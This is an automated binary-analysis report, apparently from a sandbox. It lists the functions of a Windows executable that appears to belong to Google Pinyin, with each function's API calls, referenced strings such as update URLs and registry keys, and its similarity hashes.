Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharCloseHandleMultiWide_memset$CreateFileModuleNameObjectProcessSingleWait_wcsrchr
String ID: D$DebugMessage.exe$Fatal error
API String ID: 1476933018-3349474675
Opcode ID: 040256d92af75e6177c86c28861d4988c5a778404757956d3d78f80d9f35d2c3
Instruction ID: 94b981fc7671ca11c7523741533cceb0eee81652a3a671b0d0aa1102b1d3fae8
Opcode Fuzzy Hash: 040256d92af75e6177c86c28861d4988c5a778404757956d3d78f80d9f35d2c3
Instruction Fuzzy Hash: 0741F671204341ABD724DB65DC46FAB77E8EF85700F004A2EF61A972D0EB78D508CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0043D800, Relevance: 21.3, APIs: 3, Strings: 9, Instructions: 297stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004D47D0: CreateMutexW.KERNEL32(00000000,00000000,DATA_UPDATE_MUTEX), ref: 004D4834

Part of subcall function 00453D20: CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,09D48295), ref: 00453D9B
Part of subcall function 00453D20: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000), ref: 00453DA6

Part of subcall function 00456D70: RegCreateKeyExW.ADVAPI32 ref: 00456DB9
Part of subcall function 00456D70: lstrlenW.KERNEL32(00000000), ref: 00456DC8
Part of subcall function 00456D70: RegSetValueExW.ADVAPI32(00000000,?,00000000,00000001,00000000,00000000), ref: 00456DE3
Part of subcall function 00456D70: RegCloseKey.ADVAPI32(00000000,?,00000000,00000001,00000000,00000000), ref: 00456DEE

Part of subcall function 004570E0: lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 00457136

Part of subcall function 00456F40: RegCreateKeyExW.ADVAPI32(00000000,?), ref: 00457008
Part of subcall function 00456F40: lstrlenW.KERNEL32(?), ref: 0045701A
Part of subcall function 00456F40: RegSetValueExW.ADVAPI32(?,?,00000000,00000001,?,00000000), ref: 00457035
Part of subcall function 00456F40: RegCloseKey.ADVAPI32(?), ref: 00457055

lstrlenW.KERNEL32(os=win_x64), ref: 0043D9FD
lstrlenW.KERNEL32(os=win_x86), ref: 0043DA52
ShellExecuteW.SHELL32(00000000,00000000,?,?,00000000,00000005), ref: 0043DBA9

Strings

os=win_x64, xrefs: 0043D9F1, 0043DA2F
GooglePinyinDictionary.exe, xrefs: 0043DB51
pinyinsysdict, xrefs: 0043D852
https://tools.google.com/service/update, xrefs: 0043D885
--base_url=%s --major=%d --minor=%d, xrefs: 0043DB32
os=win_x86, xrefs: 0043DA46, 0043DA84
Software\Google\Google Pinyin 2\Autoupdate Sysdict, xrefs: 0043D84D
p1S, xrefs: 0043D909
sysdict, xrefs: 0043D896

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: Createlstrlen$CloseEventValue$ExecuteMutexShell
String ID: --base_url=%s --major=%d --minor=%d$GooglePinyinDictionary.exe$Software\Google\Google Pinyin 2\Autoupdate Sysdict$https://tools.google.com/service/update$os=win_x64$os=win_x86$p1S$pinyinsysdict$sysdict
API String ID: 2177389965-901608246
Opcode ID: b56734840254655cb8f0663073956856f398663e732665dd9f353e62b6a29c6d
Instruction ID: ddcd3f5d6517adf4dd5e513217ac5a6491fe80fbe278d079170a8381e641a2d3
Opcode Fuzzy Hash: b56734840254655cb8f0663073956856f398663e732665dd9f353e62b6a29c6d
Instruction Fuzzy Hash: E4C1A47150C3808BD721EB25D841B9FBBE4BFD9308F440A1EF58957291DB78990ACBA7

Uniqueness

Uniqueness Score: -1.00%

Function 00454300, Relevance: 19.7, APIs: 13, Instructions: 167networkfilesynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,00000000,?,00000000,?,?,?), ref: 00454314
HttpOpenRequestW.WININET(?,00000000,?,00000000,00000000,0055B1A0,80000000,00000000), ref: 0045434F
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00454368
HttpQueryInfoW.WININET ref: 0045439B
CreateFileW.KERNEL32(?,C0000000,00000002,00000000,00000002,00000080,00000000), ref: 004543CD
SetFilePointer.KERNEL32(00000000,?,00000000,00000000), ref: 004543F6
SetEndOfFile.KERNEL32(00000000), ref: 00454402
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00454414
WaitForSingleObject.KERNEL32(?,00000000,?,?,?), ref: 00454439

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Http$ObjectPointerRequestSingleWait$CreateInfoOpenQuerySend
String ID:
API String ID: 2605227227-0
Opcode ID: 1741a61b095149ad85421eace96499a6a7711e85bb99b3db41c7b72326ff0321
Instruction ID: 256e7a866b8fa5dae9fd203eb4168e303cbbc8a8614a0861d41ce0961598f5dd
Opcode Fuzzy Hash: 1741a61b095149ad85421eace96499a6a7711e85bb99b3db41c7b72326ff0321
Instruction Fuzzy Hash: 2B51BDB1604604AFD3208F618C84F6B77ACFF95359F04462EF9459A241D738ED8A8B69

Uniqueness

Uniqueness Score: -1.00%

Function 00461430, Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 214COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0046147B
std::_Xinvalid_argument.LIBCPMT ref: 004614A1
_memmove.LIBCMT ref: 00461503
_memmove.LIBCMT ref: 0046152B
_memmove.LIBCMT ref: 00461540
_memmove.LIBCMT ref: 0046156D
_memmove.LIBCMT ref: 004615CF
_memmove.LIBCMT ref: 004615F9
std::_Xinvalid_argument.LIBCPMT ref: 00461633

Strings

string too long, xrefs: 00461476, 0046149C
invalid string position, xrefs: 0046162E

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove$Xinvalid_argumentstd::_
String ID: invalid string position$string too long
API String ID: 1771113911-4289949731
Opcode ID: 19d82692241ddf7b3d90b24c396142218cacfb20eb7a329f6b37dcf8c68e4966
Instruction ID: f71bc335e3af04468ab33a2a5ba6f160844f155943739f531625d3fa2f91dc09
Opcode Fuzzy Hash: 19d82692241ddf7b3d90b24c396142218cacfb20eb7a329f6b37dcf8c68e4966
Instruction Fuzzy Hash: 866162707042119B8724DF59D9C086AF3E6FBC17017288A2FE053CB665EB38E9458B9B

Uniqueness

Uniqueness Score: -1.00%

Function 004C46B0, Relevance: 17.8, APIs: 5, Strings: 5, Instructions: 279registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?), ref: 004C47E8
RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 004C48AA

Part of subcall function 00401050: __CxxThrowException@8.LIBCMT ref: 00401062
Part of subcall function 00401050: _memcpy_s.LIBCMT ref: 00401078

Strings

Events, xrefs: 004C47AF
%s=, xrefs: 004C46F3
%s\%s\%s, xrefs: 004C47B9
events, xrefs: 004C46EC
Software\Google\Common\Rlz, xrefs: 004C47B4

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: EnumException@8OpenThrowValue_memcpy_s
String ID: %s=$%s\%s\%s$Events$Software\Google\Common\Rlz$events
API String ID: 4032657638-87630656
Opcode ID: 6097a112680ac33a0d137469c5c066e4bd7791df1e1d02ed6352090f5754ef58
Instruction ID: ed2dac6535043a348c79436cca2467dd7ce78fe9abc5e580cba6ad8ee3a5d576
Opcode Fuzzy Hash: 6097a112680ac33a0d137469c5c066e4bd7791df1e1d02ed6352090f5754ef58
Instruction Fuzzy Hash: 90A176782047418BD350CF28C995B2AB7E5FFD9324F148B2EE4A58B2A1D734E806CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004066B0, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 265threadCOMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 004066C2
GetCurrentProcessId.KERNEL32(?,0000003A), ref: 004066F7
GetCurrentThreadId.KERNEL32 ref: 0040671D
_Smanip.LIBCPMT ref: 00406777
_Smanip.LIBCPMT ref: 0040679F
_Smanip.LIBCPMT ref: 004067DA

Part of subcall function 00406C80: std::_Lockit::_Lockit.LIBCPMT ref: 00406D3A

_Smanip.LIBCPMT ref: 0040682E
_Smanip.LIBCPMT ref: 00406868
GetTickCount.KERNEL32 ref: 004068BE

Strings

)] , xrefs: 004068E8

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: Smanip$Current$CountLockitLockit::_ProcessThreadTick_strrchrstd::_
String ID: )]
API String ID: 1414262230-4238780332
Opcode ID: a44d75294cd2881860037245605cdb7ec79f1832cb37fd364aa93c3a19a3515f
Instruction ID: befc8831e407e2a593905758ad1a005a01f1d7fef211edee3b64e353f67ba18d
Opcode Fuzzy Hash: a44d75294cd2881860037245605cdb7ec79f1832cb37fd364aa93c3a19a3515f
Instruction Fuzzy Hash: B6811BB2A003006FD714EB65DC46E1773A8AF94708F09853DF9499B382EA78ED25C7D6

Uniqueness

Uniqueness Score: -1.00%

Function 004176F0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 114COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0041771E
SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001C,00000000,?,?,?), ref: 00417734
_memset.LIBCMT ref: 0041775A
PathCombineW.SHLWAPI(?,?,VirtualStore,?,?,?,?,?,?), ref: 0041777D
_memset.LIBCMT ref: 00417797
_memset.LIBCMT ref: 004177C2
PathCombineW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004177DF

Part of subcall function 00410120: _memset.LIBCMT ref: 00410185
Part of subcall function 00410120: PathCombineW.SHLWAPI(?,09D48295,00530660,0052FD50,?,00000000), ref: 0041019B
Part of subcall function 00410120: _memset.LIBCMT ref: 004101BE
Part of subcall function 00410120: FindFirstFileW.KERNEL32(?,?), ref: 004101D6

_memset.LIBCMT ref: 0041780D
_memset.LIBCMT ref: 00417848

Strings

VirtualStore, xrefs: 00417768

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: _memset$Path$Combine$FileFindFirstFolderSpecial
String ID: VirtualStore
API String ID: 3133161270-2450178472
Opcode ID: df04f2aad980826f0919c577029fdf35f69557eb81f9396cb4bd5e32dd0a2c70
Instruction ID: 963e30e6fbffc7619de8d701eb756a9255db4d0adf58b98ecb4ab95e36b91f93
Opcode Fuzzy Hash: df04f2aad980826f0919c577029fdf35f69557eb81f9396cb4bd5e32dd0a2c70
Instruction Fuzzy Hash: A131D8B291434076D734EF629C46EEB73A9AFC8744F00491EB64993182FA79D248C79B

Uniqueness

Uniqueness Score: -1.00%

Function 00439470, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 298fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004128B0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,09D48295,00000000,?,00000000,00531340,?,?,00000000), ref: 00412904
Part of subcall function 004128B0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000), ref: 0041294D

_memset.LIBCMT ref: 004395B5
_memset.LIBCMT ref: 0043970C
PathCombineW.SHLWAPI(?,?,?,?,00000000,?), ref: 00439740
PathFileExistsW.SHLWAPI(?,?,00000000,?), ref: 00439752
DeleteFileW.KERNEL32(?,?,00000000,?), ref: 00439764
_memset.LIBCMT ref: 0043978A
PathCombineW.SHLWAPI(?,?,?,?,?,?,?,00000000,?), ref: 004397B8
PathFileExistsW.SHLWAPI(?), ref: 00439830

Strings

.00000, xrefs: 00439646

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: Path$File_memset$ByteCharCombineExistsMultiWide$Delete
String ID: .00000
API String ID: 515340337-10118669
Opcode ID: 5c9675806ad9ac994f32597ffc37b735898075d550079a6a529b8edde2954c3f
Instruction ID: 64900c5a078d0f6fdbe378e452b5d00fc6906f628c066d176d2a107508c051bd
Opcode Fuzzy Hash: 5c9675806ad9ac994f32597ffc37b735898075d550079a6a529b8edde2954c3f
Instruction Fuzzy Hash: 5FC17D7150C3818FD720EB25C441B9FB7E4BF99318F444A1EE59D87242DB78A909CBA7

Uniqueness

Uniqueness Score: -1.00%

Function 004015B0, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 72registrylibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll,00000000,?,00403441,?,?,?,?,?,?,?,?,?,?,?,00510206), ref: 004015C7
GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedW), ref: 004015D7
RegDeleteKeyW.ADVAPI32(?,?), ref: 004015F9
GetModuleHandleW.KERNEL32(Advapi32.dll,00000000,?,00403441,?,?,?,?,?,?,?,?,?,?,?,00510206), ref: 00401618
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00401628
RegDeleteKeyW.ADVAPI32(?,?), ref: 00401656

Strings

Advapi32.dll, xrefs: 004015C2, 00401613
RegDeleteKeyTransactedW, xrefs: 004015D1
RegDeleteKeyExW, xrefs: 00401622

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressDeleteHandleModuleProc
String ID: Advapi32.dll$RegDeleteKeyExW$RegDeleteKeyTransactedW
API String ID: 588496660-1053001802
Opcode ID: 8d10c3cc95e54cee3f1f94e8f5d8d2c0db16cd8ecf57aef51111d6ef15f6d564
Instruction ID: 3596795060df9d03189e76effbd37faa73b708554ecdb54f400fc0323e3269d7
Opcode Fuzzy Hash: 8d10c3cc95e54cee3f1f94e8f5d8d2c0db16cd8ecf57aef51111d6ef15f6d564
Instruction Fuzzy Hash: 46116671300211AFDB209B65FC98F577799EFB1B52F18443AF401A62E0D7749C86AB68

Uniqueness

Uniqueness Score: -1.00%

Function 004BF070, Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 345COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004BF54B

Part of subcall function 00409B50: std::_Xinvalid_argument.LIBCPMT ref: 00409B66
Part of subcall function 00409B50: std::_Xinvalid_argument.LIBCPMT ref: 00409B81

Strings

Invalid strings::Substitute() format string: ", xrefs: 004BF465
laS, xrefs: 004BF48B
laS, xrefs: 004BF33A
args were given. Full format string was: ", xrefs: 004BF31C
a, xrefs: 004BF44E
", but only , xrefs: 004BF2BF
strings::Substitute format string invalid: asked for "$, xrefs: 004BF268

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: args were given. Full format string was: "$", but only $Invalid strings::Substitute() format string: "$a$laS$laS$strings::Substitute format string invalid: asked for "$
API String ID: 2168136238-2065123448
Opcode ID: 468b8739f613739d3056e56cf01c248b19a5cec487b8cecdda009cb83348e44f
Instruction ID: cd3ae5ac69547c69dcbc71f1ff6cfa6356f00f87383df38d7ede48e7dfcef321
Opcode Fuzzy Hash: 468b8739f613739d3056e56cf01c248b19a5cec487b8cecdda009cb83348e44f
Instruction Fuzzy Hash: ECE17B705083849FD730DF29C880BABBBE4AF85704F10492EE5D947392DB79A909CB67

Uniqueness

Uniqueness Score: -1.00%

Function 00411410, Relevance: 13.6, APIs: 9, Instructions: 140memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000008,?,09D48295,00000007,?,?,00000000,0040493A,?,00015180,0003F480,00002A30,00000000,00000000,0000002C), ref: 00411453
OpenProcessToken.ADVAPI32(00000000,?,00000000,0040493A,?,00015180,0003F480,00002A30,00000000,00000000,0000002C,?,00000000), ref: 0041145A
GetTokenInformation.ADVAPI32(?,00000002,00000000,00000400,?,00000000,0040493A,?,00015180,0003F480,00002A30,00000000,00000000,0000002C,?,00000000), ref: 0041149B
GetLastError.KERNEL32(?,00000000), ref: 004114A3
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 004114DE
CloseHandle.KERNEL32(?,?,00000000), ref: 004114E7
AllocateAndInitializeSid.ADVAPI32 ref: 0041151D
EqualSid.ADVAPI32(?), ref: 0041154E
FreeSid.ADVAPI32(?), ref: 0041156C

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: Token$InformationProcess$AllocateCloseCurrentEqualErrorFreeHandleInitializeLastOpen
String ID:
API String ID: 993157163-0
Opcode ID: f86a6bcd6e2d47e6ce0ba4a011d1aa87200eefd0d4866bc3959086f6ba07237b
Instruction ID: 04a6a638284c5da2ca820843a0bb54f5e7838b054d85005c68b1191654b624e2
Opcode Fuzzy Hash: f86a6bcd6e2d47e6ce0ba4a011d1aa87200eefd0d4866bc3959086f6ba07237b
Instruction Fuzzy Hash: FA4113B2604341AFC310DF26DC85A5BB7E9FF95750F400A2EF24683290E638D949CB66

Uniqueness

Uniqueness Score: -1.00%

Function 0040C660, Relevance: 13.6, APIs: 9, Instructions: 98threadCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040C684
GetCurrentThread.KERNEL32 ref: 0040C6EF
GetCurrentProcess.KERNEL32(00000000,?,00000000), ref: 0040C6F6
StackWalk64.DBGHELP(0000014C,00000000,?,00000000), ref: 0040C702
VirtualQuery.KERNEL32(0040C630,?,0000001C,?,00000000), ref: 0040C720
VirtualQuery.KERNEL32(?,?,0000001C,?,00000000), ref: 0040C736
GetCurrentThread.KERNEL32 ref: 0040C759
GetCurrentProcess.KERNEL32(00000000,?,00000000), ref: 0040C760
StackWalk64.DBGHELP(0000014C,00000000,?,00000000), ref: 0040C76C

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: Current$ProcessQueryStackThreadVirtualWalk64$_memset
String ID:
API String ID: 3754933484-0
Opcode ID: 26cab8aa042423dc8fe3d68e38dc39228cf9e64bb9121bf89e80b8cfa0533b2a
Instruction ID: 5856f87ee3719165e18141704ccbc271678940824bf61902e27000180bbfcca7
Opcode Fuzzy Hash: 26cab8aa042423dc8fe3d68e38dc39228cf9e64bb9121bf89e80b8cfa0533b2a
Instruction Fuzzy Hash: 74316A72604701ABD320DFA4DC46FABBBE8FFA9741F004A19F649C3290D775A508DB96

Uniqueness

Uniqueness Score: -1.00%

Function 00442720, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 287COMMON

Download Yara Rule

APIs

Part of subcall function 0040F940: RegOpenKeyExW.ADVAPI32(80000002), ref: 0040F9CA

Part of subcall function 004051E0: _memmove.LIBCMT ref: 00405218

GetSystemDefaultLangID.KERNEL32(00000002,?,?,?,00000005,?,?,?,00000005), ref: 0044295C

Strings

brand, xrefs: 00442809
version, xrefs: 0044276A
%04x, xrefs: 0044296A
osver, xrefs: 0044289C
h3S, xrefs: 00442938
rlz, xrefs: 004429DE

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: DefaultLangOpenSystem_memmove
String ID: %04x$brand$h3S$osver$rlz$version
API String ID: 1615369108-593104895
Opcode ID: 68de627df94efe73fea92e91824433bc7caba42a0a92d64470145a61cef22419
Instruction ID: 75927a628608c53961155f1d1fee205a03850352040fae8e4e29f3cd57f1b155
Opcode Fuzzy Hash: 68de627df94efe73fea92e91824433bc7caba42a0a92d64470145a61cef22419
Instruction Fuzzy Hash: CAB1B2715087809FD300DB2AC84161BBBE5BFC9318F484E2EF499973A1DB79E944CB56

Uniqueness

Uniqueness Score: -1.00%

Function 004A23E0, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 207COMMON

Download Yara Rule

APIs

_sprintf.LIBCMT ref: 004A244E

Part of subcall function 00485150: EnterCriticalSection.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,09D48295,00000000,00000000), ref: 004851A4
Part of subcall function 00485150: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,09D48295,00000000,00000000), ref: 004851B7
Part of subcall function 00485150: __CxxThrowException@8.LIBCMT ref: 00485234

Strings

CHECK failed: (size) <= (6): , xrefs: 004A25A0
CHECK failed: (temp[size-1]) == ('5'): , xrefs: 004A2525
5, xrefs: 004A24E9
CHECK failed: (temp[0]) == ('1'): , xrefs: 004A2496
1, xrefs: 004A2456
%.1f, xrefs: 004A243A

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterException@8LeaveThrow_sprintf
String ID: %.1f$1$5$CHECK failed: (size) <= (6): $CHECK failed: (temp[0]) == ('1'): $CHECK failed: (temp[size-1]) == ('5'):
API String ID: 3189710002-2954466161
Opcode ID: aa18c1ca606d58f85d74b9de2693819935c6a93320ff13334b547cbf36c1ec46
Instruction ID: d49f8d720bac5f902cfb39332b85bbff5cd6531c2e5330614fa27faed3947a52
Opcode Fuzzy Hash: aa18c1ca606d58f85d74b9de2693819935c6a93320ff13334b547cbf36c1ec46
Instruction Fuzzy Hash: E28188B09083809FD320CF2AC991B5BBBE5FF95704F404A2EF49547292D7B99909CF96

Uniqueness

Uniqueness Score: -1.00%

Function 0045B840, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 196memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 0045B92A
VariantClear.OLEAUT32(?), ref: 0045B97E
SysFreeString.OLEAUT32(?), ref: 0045BA42

Strings

https://clients2.google.com/accounts/ClientLogin, xrefs: 0045B8F2
application/x-www-form-urlencoded, xrefs: 0045B90C
Content-Type, xrefs: 0045B911
